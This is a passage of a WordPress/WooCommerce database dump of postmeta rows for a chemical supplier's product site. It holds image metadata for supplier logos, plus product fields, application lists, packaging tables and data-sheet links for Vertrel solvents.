INSERT INTO `wp_postmeta` VALUES (13968, 1242, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13974, 1244, '_wp_attached_file', '2016/09/medical-chemicals-e1473176123772.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13975, 1244, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:44:"2016/09/medical-chemicals-e1473176123772.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"medical-chemicals-e1473176123772-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13976, 1244, '_edit_lock', '1473175992:2'); 
INSERT INTO `wp_postmeta` VALUES (13977, 1244, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:21:"medical-chemicals.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:28:"medical-chemicals-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:28:"medical-chemicals-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:28:"medical-chemicals-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:28:"medical-chemicals-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:28:"medical-chemicals-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:28:"medical-chemicals-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13978, 1244, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13980, 1247, '_wp_attached_file', '2016/09/releasys-release-agents-e1473184888220.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13981, 1247, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:50:"2016/09/releasys-release-agents-e1473184888220.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:49:"releasys-release-agents-e1473184888220-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:49:"releasys-release-agents-e1473184888220-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13982, 1248, '_wp_attached_file', '2016/09/solvsys-e1473184897597.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13983, 1248, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:34:"2016/09/solvsys-e1473184897597.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"solvsys-e1473184897597-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"solvsys-e1473184897597-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13984, 1249, '_wp_attached_file', '2016/09/tribosys-e1473184906141.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13985, 1249, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:35:"2016/09/tribosys-e1473184906141.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"tribosys-e1473184906141-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"tribosys-e1473184906141-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13986, 1247, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:27:"releasys-release-agents.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13987, 1248, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:11:"solvsys.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13988, 1249, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:12:"tribosys.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13989, 1101, '_edit_lock', '1473185124:1'); 
INSERT INTO `wp_postmeta` VALUES (13990, 1253, '_wp_attached_file', '2016/09/shieldsys-e1473185924557.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13991, 1253, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:36:"2016/09/shieldsys-e1473185924557.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"shieldsys-e1473185924557-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"shieldsys-e1473185924557-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13992, 1253, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:13:"shieldsys.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13993, 1255, '_wp_attached_file', '2016/09/Vazo-logo-e1473186211648.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13994, 1255, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:36:"2016/09/Vazo-logo-e1473186211648.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"Vazo-logo-e1473186211648-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"Vazo-logo-e1473186211648-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13995, 1255, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:13:"Vazo-logo.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13996, 1257, '_wp_attached_file', '2016/09/opteon-logo-e1473186453928.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13997, 1257, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:38:"2016/09/opteon-logo-e1473186453928.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"opteon-logo-e1473186453928-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"opteon-logo-e1473186453928-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13998, 1257, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:15:"opteon-logo.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13999, 1259, '_wp_attached_file', '2016/09/fluoroextreme-e1473186772999.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14000, 1259, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:40:"2016/09/fluoroextreme-e1473186772999.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"fluoroextreme-e1473186772999-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"fluoroextreme-e1473186772999-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14001, 1259, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:17:"fluoroextreme.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14002, 1261, '_wp_attached_file', '2016/09/hexion-logo-e1473186988551.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14003, 1261, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:38:"2016/09/hexion-logo-e1473186988551.jpg";s:5:"sizes";a:2:{s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"hexion-logo-e1473186988551-200x99.jpg";s:5:"width";i:200;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"hexion-logo-e1473186988551-225x99.jpg";s:5:"width";i:225;s:6:"height";i:99;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14004, 1261, '_wp_attachment_backup_sizes', 'a:1:{s:9:"full-orig";a:3:{s:5:"width";i:240;s:6:"height";i:99;s:4:"file";s:15:"hexion-logo.jpg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14005, 1178, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14006, 1263, '_edit_lock', '1494529785:2'); 
INSERT INTO `wp_postmeta` VALUES (14007, 1263, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14008, 1264, '_wp_attached_file', '2016/09/vertrel-solvent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14009, 1264, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:7500;s:6:"height";i:5000;s:4:"file";s:27:"2016/09/vertrel-solvent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"vertrel-solvent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"vertrel-solvent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"vertrel-solvent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"vertrel-solvent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"vertrel-solvent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"vertrel-solvent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"vertrel-solvent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"vertrel-solvent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14010, 1263, '_thumbnail_id', '1264'); 
INSERT INTO `wp_postmeta` VALUES (14011, 1265, '_wp_attached_file', '2016/09/MCA-EC.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14012, 1266, '_wp_attached_file', '2016/09/SDG-EC.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14013, 1267, '_wp_attached_file', '2016/09/SFR-EC.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14014, 1263, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14015, 1263, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14016, 1263, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14017, 1263, '716_default_editor', '<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Medium and Heavy Soil Removal</li>\r\n 	<li>Light Soil Removal</li>\r\n 	<li>Oxygen Service Cleaning</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14018, 1263, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14019, 1263, '318_custom_list_file', 'a:1:{s:32:"96bfb386b6c75a0e23a8b9431c7ae358";a:3:{s:4:"name";s:15:"Vertrel MCA PDF";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MCA-EC.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14020, 1263, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14021, 1263, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14022, 1263, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14023, 1263, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14024, 1263, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14025, 1263, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14026, 1263, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14027, 1263, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14028, 1263, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14029, 1263, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14030, 1263, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14031, 1263, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14032, 1263, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14033, 1263, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14034, 1263, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14035, 1263, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14036, 1263, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14037, 1263, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14038, 1263, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14039, 1263, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14040, 1263, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14041, 1263, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14042, 1263, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14043, 1263, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14044, 1263, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (14045, 1263, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14046, 1263, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14047, 1263, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14048, 1263, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14049, 1263, '_product_image_gallery', '1821'); 
INSERT INTO `wp_postmeta` VALUES (14050, 1268, '_edit_lock', '1494596781:2'); 
INSERT INTO `wp_postmeta` VALUES (14051, 1268, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14053, 1268, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14054, 1268, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14055, 1268, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14056, 1268, '716_default_editor', '<ul>\r\n 	<li>Medium and Heavy Soil Removal</li>\r\n 	<li>Light Soil Removal</li>\r\n 	<li>Silicone Deposition and Tube Swelling</li>\r\n 	<li>Precision Cleaning</li>\r\n 	<li>Carrier Fluid/Lubricant Deposition</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14057, 1268, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14058, 1268, '318_custom_list_file', 'a:1:{s:32:"411bdd79176204e32154862bda1a214c";a:3:{s:4:"name";s:15:"Vertrel SDG PDF";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/SDG-EC.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14059, 1268, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="224"><strong>Glass</strong></td>\r\n<td style="text-align: center;" width="263"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">8 oz.</td>\r\n<td style="text-align: center;">Quart.</td>\r\n<td style="text-align: center;">5 Gallons</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">12 oz.</td>\r\n<td style="text-align: center;">1 Gallon</td>\r\n<td style="text-align: center;">55 Gallons</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14060, 1268, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14061, 1268, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14062, 1268, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14063, 1268, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14064, 1268, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14065, 1268, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14066, 1268, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14067, 1268, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14068, 1268, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14069, 1268, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14070, 1268, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14071, 1268, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14072, 1268, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14073, 1268, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14074, 1268, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14075, 1268, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14076, 1268, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14077, 1268, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14078, 1268, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14079, 1268, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14080, 1268, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14081, 1268, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14082, 1268, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14083, 1268, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14084, 1268, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14085, 1268, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14086, 1268, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (14113, 1270, '_edit_lock', '1474471011:2'); 
INSERT INTO `wp_postmeta` VALUES (14114, 1270, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14115, 1271, '_wp_attached_file', '2016/09/vertrel-sdg-e1473257632273.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14116, 1271, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3059;s:6:"height";i:2528;s:4:"file";s:38:"2016/09/vertrel-sdg-e1473257632273.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-800x661.jpg";s:5:"width";i:800;s:6:"height";i:661;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-768x635.jpg";s:5:"width";i:768;s:6:"height";i:635;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"vertrel-sdg-e1473257632273-1600x1322.jpg";s:5:"width";i:1600;s:6:"height";i:1322;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"vertrel-sdg-e1473257632273-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s: